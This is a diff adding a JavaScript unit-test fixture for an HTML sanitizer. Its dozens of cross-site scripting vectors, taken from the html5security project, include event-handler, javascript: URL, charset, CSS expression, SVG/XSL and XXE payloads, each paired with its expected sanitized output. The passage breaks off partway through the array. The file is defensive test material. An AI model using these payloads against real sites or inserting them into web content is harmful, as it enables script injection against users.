1.1 --- /dev/null Thu Jan 01 00:00:00 1970 +0000 1.2 +++ b/parser/xml/test/unit/results.js Wed Dec 31 06:09:35 2014 +0100 1.3 
@@ -0,0 +1,844 @@ 1.4 +// vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license 1.5 + 1.6 +var vectors = [ 1.7 + { 1.8 + "data": "<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>", 1.9 + "sanitized": "<html><head></head><body></body></html>" 1.10 + }, 1.11 + { 1.12 + "data": "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi", 1.13 + "sanitized": "<html><head></head><body>&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi</body></html>" 1.14 + }, 1.15 + { 1.16 + "data": "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>", 1.17 + "sanitized": "<html><head></head><body>&alert&A7&(1)&R&UA;&&<&A9&11/script&X&></body></html>" 1.18 + }, 1.19 + { 1.20 + "data": "0?<script>Worker(\"#\").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))", 1.21 + "sanitized": "<html><head></head><body>0? 
:postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>" 1.22 + }, 1.23 + { 1.24 + "data": "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", 1.25 + "sanitized": "<html><head></head><body></body></html>" 1.26 + }, 1.27 + { 1.28 + "data": "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", 1.29 + "sanitized": "<html><head></head><body></body></html>" 1.30 + }, 1.31 + { 1.32 + "data": "<input onfocus=write(1) autofocus>", 1.33 + "sanitized": "<html><head></head><body></body></html>" 1.34 + }, 1.35 + { 1.36 + "data": "<input onblur=write(1) autofocus><input autofocus>", 1.37 + "sanitized": "<html><head></head><body></body></html>" 1.38 + }, 1.39 + { 1.40 + "data": "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>", 1.41 + "sanitized": "<html><head></head><body><a>X</a></body></html>" 1.42 + }, 1.43 + { 1.44 + "data": "<video poster=javascript:alert(1)//></video>", 1.45 + "sanitized": "<html><head></head><body><video controls=\"controls\" poster=\"javascript:alert(1)//\"></video></body></html>" 1.46 + }, 1.47 + { 1.48 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>", 1.49 + "sanitized": "<html><head></head><body></body></html>" 1.50 + }, 1.51 + { 1.52 + "data": "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>", 1.53 + "sanitized": "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>" 1.54 + }, 1.55 + { 1.56 + "data": "<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>", 1.57 + "sanitized": "<html><head></head><body>01</body></html>" 1.58 + }, 1.59 + { 1.60 + "data": "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>", 1.61 + "sanitized": "<html><head></head><body></body></html>" 1.62 + }, 1.63 + { 1.64 + "data": "<script>({0:#0=alert/#0#/#0#(0)})</script>", 1.65 + 
"sanitized": "<html><head></head><body></body></html>" 1.66 + }, 1.67 + { 1.68 + "data": "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >", 1.69 + "sanitized": "<html><head></head><body>X</body></html>" 1.70 + }, 1.71 + { 1.72 + "data": "<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>", 1.73 + "sanitized": "<html><head></head><body></body></html>" 1.74 + }, 1.75 + { 1.76 + "data": "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(1)</script>", 1.77 + "sanitized": "<html><head></head><body></body></html>" 1.78 + }, 1.79 + { 1.80 + "data": "<meta charset=\"x-mac-farsi\">�script �alert(1)//�/script �", 1.81 + "sanitized": "<html><head></head><body>�script �alert(1)//�/script �</body></html>" 1.82 + }, 1.83 + { 1.84 + "data": "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", 1.85 + "sanitized": "<html><head></head><body></body></html>" 1.86 + }, 1.87 + { 1.88 + "data": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", 1.89 + "sanitized": "<html><head></head><body></body></html>" 1.90 + }, 1.91 + { 1.92 + "data": "<input onblur=focus() autofocus><input>", 1.93 + "sanitized": "<html><head></head><body></body></html>" 1.94 + }, 1.95 + { 1.96 + "data": "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>", 1.97 + "sanitized": "<html><head></head><body></body></html>" 1.98 + }, 1.99 + { 1.100 + "data": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>", 1.101 + "sanitized": "<html><head></head><body>1</body></html>" 1.102 + }, 1.103 + { 1.104 + "data": "<script src=\"#\">{alert(1)}</script>;1", 1.105 + "sanitized": "<html><head></head><body>;1</body></html>" 1.106 + }, 1.107 + { 1.108 + "data": "+ADw-html+AD4APA-body+AD4APA-div+AD4-top 
secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);", 1.109 + "sanitized": "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>" 1.110 + }, 1.111 + { 1.112 + "data": "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", 1.113 + "sanitized": "<html><head></head><body></body></html>" 1.114 + }, 1.115 + { 1.116 + "data": "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>", 1.117 + "sanitized": "<html><head></head><body>1</body></html>" 1.118 + }, 1.119 + { 1.120 + "data": "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d", 1.121 + "sanitized": "<html><head></head><body></body></html>" 1.122 + }, 1.123 + { 1.124 + "data": "<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>", 1.125 + "sanitized": "<html><head></head><body></body></html>" 1.126 + }, 1.127 + { 1.128 + "data": "<frameset onload=alert(1)>", 1.129 + "sanitized": "<html><head></head></html>" 1.130 + }, 1.131 + { 1.132 + "data": "<table background=\"javascript:alert(1)\"></table>", 1.133 + "sanitized": "<html><head></head><body><table></table></body></html>" 1.134 + }, 1.135 + { 1.136 + "data": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>", 1.137 + "sanitized": "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>" 1.138 + }, 1.139 + { 1.140 + "data": "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>", 1.141 + "sanitized": "<html><head></head><body>1</body></html>" 1.142 + }, 1.143 + { 1.144 + "data": "1<a href=#><line 
xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>", 1.145 + "sanitized": "<html><head></head><body>1<a></a></body></html>" 1.146 + }, 1.147 + { 1.148 + "data": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>", 1.149 + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" 1.150 + }, 1.151 + { 1.152 + "data": "<!--<img src=\"--><img src=x onerror=alert(1)//\">", 1.153 + "sanitized": "<html><head></head><body><img></body></html>" 1.154 + }, 1.155 + { 1.156 + "data": "<comment><img src=\"</comment><img src=x onerror=alert(1)//\">", 1.157 + "sanitized": "<html><head></head><body><img></body></html>" 1.158 + }, 1.159 + { 1.160 + "data": "<!-- up to Opera 11.52, FF 3.6.28 -->\r\n<![><img src=\"]><img src=x onerror=alert(1)//\">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->\r\n<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>", 1.161 + "sanitized": "<html><head></head><body><img>\n\n\n><image xlink:href=\"<img></body></html>" 1.162 + }, 1.163 + { 1.164 + "data": "<style><img src=\"</style><img src=x onerror=alert(1)//\">", 1.165 + "sanitized": "<html><head></head><body><img></body></html>" 1.166 + }, 1.167 + { 1.168 + "data": "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", 1.169 + "sanitized": "<html><head></head><body><li></li>\n<div></div></body></html>" 1.170 + }, 1.171 + { 1.172 + "data": "<head><base href=\"javascript://\"/></head><body><a href=\"/. 
/,alert(1)//#\">XXX</a></body>", 1.173 + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" 1.174 + }, 1.175 + { 1.176 + "data": "<?xml version=\"1.0\" standalone=\"no\"?>\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<style type=\"text/css\">\r\n@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>", 1.177 + "sanitized": "<html><head>\n\n</head>\n<body>Hello\n</body></html>" 1.178 + }, 1.179 + { 1.180 + "data": "<style>*[{}@import'test.css?]{color: green;}</style>X", 1.181 + "sanitized": "<html><head></head><body>X</body></html>" 1.182 + }, 1.183 + { 1.184 + "data": "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>", 1.185 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" 1.186 + }, 1.187 + { 1.188 + "data": "<div style=\"font-family:foo}color=red;\">XXX</div>", 1.189 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" 1.190 + }, 1.191 + { 1.192 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>", 1.193 + "sanitized": "<html><head></head><body></body></html>" 1.194 + }, 1.195 + { 1.196 + "data": "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>", 1.197 + "sanitized": "<html><head></head><body></body></html>" 1.198 + }, 1.199 + { 1.200 + "data": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>", 1.201 + "sanitized": "<html><head></head><body></body></html>" 1.202 + }, 1.203 + { 1.204 + "data": "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>", 1.205 + "sanitized": "<html><head></head><body></body></html>" 1.206 + }, 1.207 + { 1.208 + "data": "<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>", 1.209 + "sanitized": "<html><head></head><body></body></html>" 1.210 + }, 1.211 + { 1.212 + "data": "<x 
style=\"behavior:url(test.sct)\">", 1.213 + "sanitized": "<html><head></head><body></body></html>" 1.214 + }, 1.215 + { 1.216 + "data": "<xml id=\"xss\" src=\"test.htc\"></xml>\r\n<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>", 1.217 + "sanitized": "<html><head></head><body>\n<label></label></body></html>" 1.218 + }, 1.219 + { 1.220 + "data": "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", 1.221 + "sanitized": "<html><head></head><body></body></html>" 1.222 + }, 1.223 + { 1.224 + "data": "<video><source onerror=\"alert(1)\">", 1.225 + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>" 1.226 + }, 1.227 + { 1.228 + "data": "<video onerror=\"alert(1)\"><source></source></video>", 1.229 + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>" 1.230 + }, 1.231 + { 1.232 + "data": "<b <script>alert(1)//</script>0</script></b>", 1.233 + "sanitized": "<html><head></head><body><b>alert(1)//0</b></body></html>" 1.234 + }, 1.235 + { 1.236 + "data": "<b><script<b></b><alert(1)</script </b></b>", 1.237 + "sanitized": "<html><head></head><body><b></b></body></html>" 1.238 + }, 1.239 + { 1.240 + "data": "<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>", 1.241 + "sanitized": "<html><head></head><body><div id=\"div1\"></div> <div id=\"div2\"></div></body></html>" 1.242 + }, 1.243 + { 1.244 + "data": "<div style=\"[a]color[b]:[c]red\">XXX</div>", 1.245 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" 1.246 + }, 1.247 + { 1.248 + "data": "<div style=\"\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;\">XXX</div>", 1.249 + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" 1.250 + }, 1.251 + { 1.252 + "data": "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>", 1.253 + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>" 1.254 + }, 1.255 + { 1.256 + "data": "<embed src=\"javascript:alert(1)\"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src=\"javascript:alert(2)\">\r\n<image src=\"javascript:alert(2)\"> // IE6, O10.10�, OM10.0�\r\n<script src=\"javascript:alert(3)\"></script> // IE6, O11.01�, OM10.1�", 1.257 + "sanitized": "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>" 1.258 + }, 1.259 + { 1.260 + "data": "<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>", 1.261 + "sanitized": "<!DOCTYPE x[<!entity>\n<html><head></head><body>]>&x;</body></html>" 1.262 + }, 1.263 + { 1.264 + "data": "<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>", 1.265 + "sanitized": "<html><head></head><body></body></html>" 1.266 + }, 1.267 + { 1.268 + "data": "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>", 1.269 + "sanitized": "<html><head></head><body></body></html>" 1.270 + }, 1.271 + { 1.272 + "data": "<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"\r\n onerror CDATA \"alert(1)\"\r\n onload CDATA \"alert(2)\">\r\n]><img />", 1.273 + "sanitized": "<!DOCTYPE 
x>\n<html><head></head><body>]><img></body></html>" 1.274 + }, 1.275 + { 1.276 + "data": "<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\r\n\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x>\r\n</doc>", 1.277 + "sanitized": "<html><head></head><body>\n\tXXX\n</body></html>" 1.278 + }, 1.279 + { 1.280 + "data": "<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>", 1.281 + "sanitized": "<html><head></head><body></body></html>" 1.282 + }, 1.283 + { 1.284 + "data": "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", 1.285 + "sanitized": "<html><head></head><body><div>x</div></body></html>" 1.286 + }, 1.287 + { 1.288 + "data": "<// style=x:expression\\28write(1)\\29>", 1.289 + "sanitized": "<html><head></head><body></body></html>" 1.290 + }, 1.291 + { 1.292 + "data": "<form><button formaction=\"javascript:alert(1)\">X</button>", 1.293 + "sanitized": "<html><head></head><body></body></html>" 1.294 + }, 1.295 + { 1.296 + "data": "<event-source src=\"event.php\" onload=\"alert(1)\">", 1.297 + "sanitized": "<html><head></head><body></body></html>" 1.298 + }, 1.299 + { 1.300 + "data": "<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>", 1.301 + "sanitized": "<html><head></head><body><a></a></body></html>" 1.302 + }, 1.303 + { 1.304 + "data": "<script<{alert(1)}/></script </>", 1.305 + "sanitized": "<html><head></head><body></body></html>" 1.306 + }, 1.307 + { 1.308 + "data": "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>", 1.309 + "sanitized": "<!DOCTYPE x SYSTEM \"test.dtd\">\n<html><head></head><body>&x;</body></html>" 1.310 + }, 1.311 + { 1.312 + "data": "<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>", 1.313 + "sanitized": 
"<html><head></head><body></body></html>" 1.314 + }, 1.315 + { 1.316 + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>", 1.317 + "sanitized": "<html><head></head><body><img></body></html>" 1.318 + }, 1.319 + { 1.320 + "data": "<object allowscriptaccess=\"always\" data=\"test.swf\"></object>", 1.321 + "sanitized": "<html><head></head><body></body></html>" 1.322 + }, 1.323 + { 1.324 + "data": "<style>*{x:EXPRESSION(write(1))}</style>", 1.325 + "sanitized": "<html><head></head><body></body></html>" 1.326 + }, 1.327 + { 1.328 + "data": "<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>", 1.329 + "sanitized": "<html><head></head><body></body></html>" 1.330 + }, 1.331 + { 1.332 + "data": "<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>", 1.333 + "sanitized": "<html><head></head><body></body></html>" 1.334 + }, 1.335 + { 1.336 + "data": "<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\" x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>", 1.337 + "sanitized": "<html><head></head><body></body></html>" 1.338 + }, 1.339 + { 1.340 + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>", 1.341 + "sanitized": "<html><head></head><body></body></html>" 1.342 + }, 1.343 + { 1.344 + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>", 1.345 + "sanitized": "<html><head></head><body></body></html>" 1.346 + }, 1.347 + { 1.348 + "data": "<body oninput=alert(1)><input autofocus>", 1.349 + "sanitized": "<html><head></head><body></body></html>" 1.350 + }, 1.351 + { 1.352 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" 
fill=\"white\"/></a>\n</svg>", 1.353 + "sanitized": "<html><head></head><body>\n\n</body></html>" 1.354 + }, 1.355 + { 1.356 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n\n<animation xlink:href=\"javascript:alert(1)\"/>\n<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<foreignObject xlink:href=\"javascript:alert(1)\"/>\n<foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/>\n\n</svg>", 1.357 + "sanitized": "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>" 1.358 + }, 1.359 + { 1.360 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<set attributeName=\"onmouseover\" to=\"alert(1)\"/>\n<animate attributeName=\"onunload\" to=\"alert(1)\"/>\n</svg>", 1.361 + "sanitized": "<html><head></head><body>\n\n\n</body></html>" 1.362 + }, 1.363 + { 1.364 + "data": "<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style=\"background:url(test5.svg)\">PRESS ENTER</div>", 1.365 + "sanitized": "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>" 1.366 + }, 1.367 + { 1.368 + "data": "[A]\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n[B]\n<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n[C]\n<! 
foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">\n[D]\n<% foo><x foo=\"%><script>alert(1)</script>\">", 1.369 + "sanitized": "<html><head></head><body>[A]\n\">\n\">\n\">\n[B]\n\">\n[C]\n\n[D]\n<% foo></body></html>" 1.370 + }, 1.371 + { 1.372 + "data": "<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>", 1.373 + "sanitized": "<html><head></head><body><div>X</div></body></html>" 1.374 + }, 1.375 + { 1.376 + "data": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>", 1.377 + "sanitized": "<html><head></head><body><div>X</div></body></html>" 1.378 + }, 1.379 + { 1.380 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler>\n</svg>", 1.381 + "sanitized": "<html><head></head><body>\nalert(1)\n</body></html>" 1.382 + }, 1.383 + { 1.384 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<feImage>\n<set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>\n</feImage>\n</svg>", 1.385 + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>" 1.386 + }, 1.387 + { 1.388 + "data": "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>", 1.389 + "sanitized": "<html><head></head><body>\n</body></html>" 1.390 + }, 1.391 + { 1.392 + "data": "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>", 1.393 + "sanitized": "<html><head></head><body><div id=\"d\"></div>\n\n\n\n<div id=\"d\"></div>\n</body></html>" 1.394 + }, 1.395 + { 1.396 + "data": "<div id=d><div 
style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>\n<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>", 1.397 + "sanitized": "<html><head></head><body><div id=\"d\"><div>X</div></div>\n</body></html>" 1.398 + }, 1.399 + { 1.400 + "data": "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red} /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>", 1.401 + "sanitized": "<html><head></head><body>XXX</body></html>" 1.402 + }, 1.403 + { 1.404 + "data": "<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">", 1.405 + "sanitized": "<html><head></head><body></body></html>" 1.406 + }, 1.407 + { 1.408 + "data": "<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>", 1.409 + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" 1.410 + }, 1.411 + { 1.412 + "data": "<img src=\"x` `<script>alert(1)</script>\"` `>", 1.413 + "sanitized": "<html><head></head><body><img></body></html>" 1.414 + }, 1.415 + { 1.416 + "data": "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>", 1.417 + "sanitized": "<html><head></head><body></body></html>" 1.418 + }, 1.419 + { 1.420 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">\r\n<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>\r\n</svg>", 1.421 + "sanitized": "<html><head></head><body>\n\n</body></html>" 1.422 + }, 1.423 + { 1.424 + "data": "<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>", 1.425 + "sanitized": 
"<html><head></head><body></body></html>" 1.426 + }, 1.427 + { 1.428 + "data": "<img src onerror /\" '\"= alt=alert(1)//\">", 1.429 + "sanitized": "<html><head></head><body><img></body></html>" 1.430 + }, 1.431 + { 1.432 + "data": "<title onpropertychange=alert(1)></title><title title=></title>", 1.433 + "sanitized": "<html><head><title></title><title title=\"\"></title></head><body></body></html>" 1.434 + }, 1.435 + { 1.436 + "data": "<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">\r\n<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">", 1.437 + "sanitized": "<html><head></head><body><a href=\"http://foo.bar/#x=%60y\"></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\n\n\n<img alt=\"`><img src=xx:x onerror=alert(2)//\">\n<img alt=\"`><img src=xx:x onerror=alert(3)//\"></body></html>" 1.438 + }, 1.439 + { 1.440 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>\n<rect fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>\n</svg>", 1.441 + "sanitized": "<html><head></head><body>\n\n\n</body></html>" 1.442 + }, 1.443 + { 1.444 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>\r\n</svg>", 1.445 + "sanitized": "<html><head></head><body>\n\n</body></html>" 1.446 + }, 1.447 + { 1.448 + "data": "<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>", 1.449 + "sanitized": "<html><head></head><body><div>X</div></body></html>" 1.450 + }, 1.451 + { 1.452 + "data": "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>", 1.453 + "sanitized": "<html><head></head><body><div>X</div></body></html>" 1.454 + }, 1.455 + { 1.456 + 
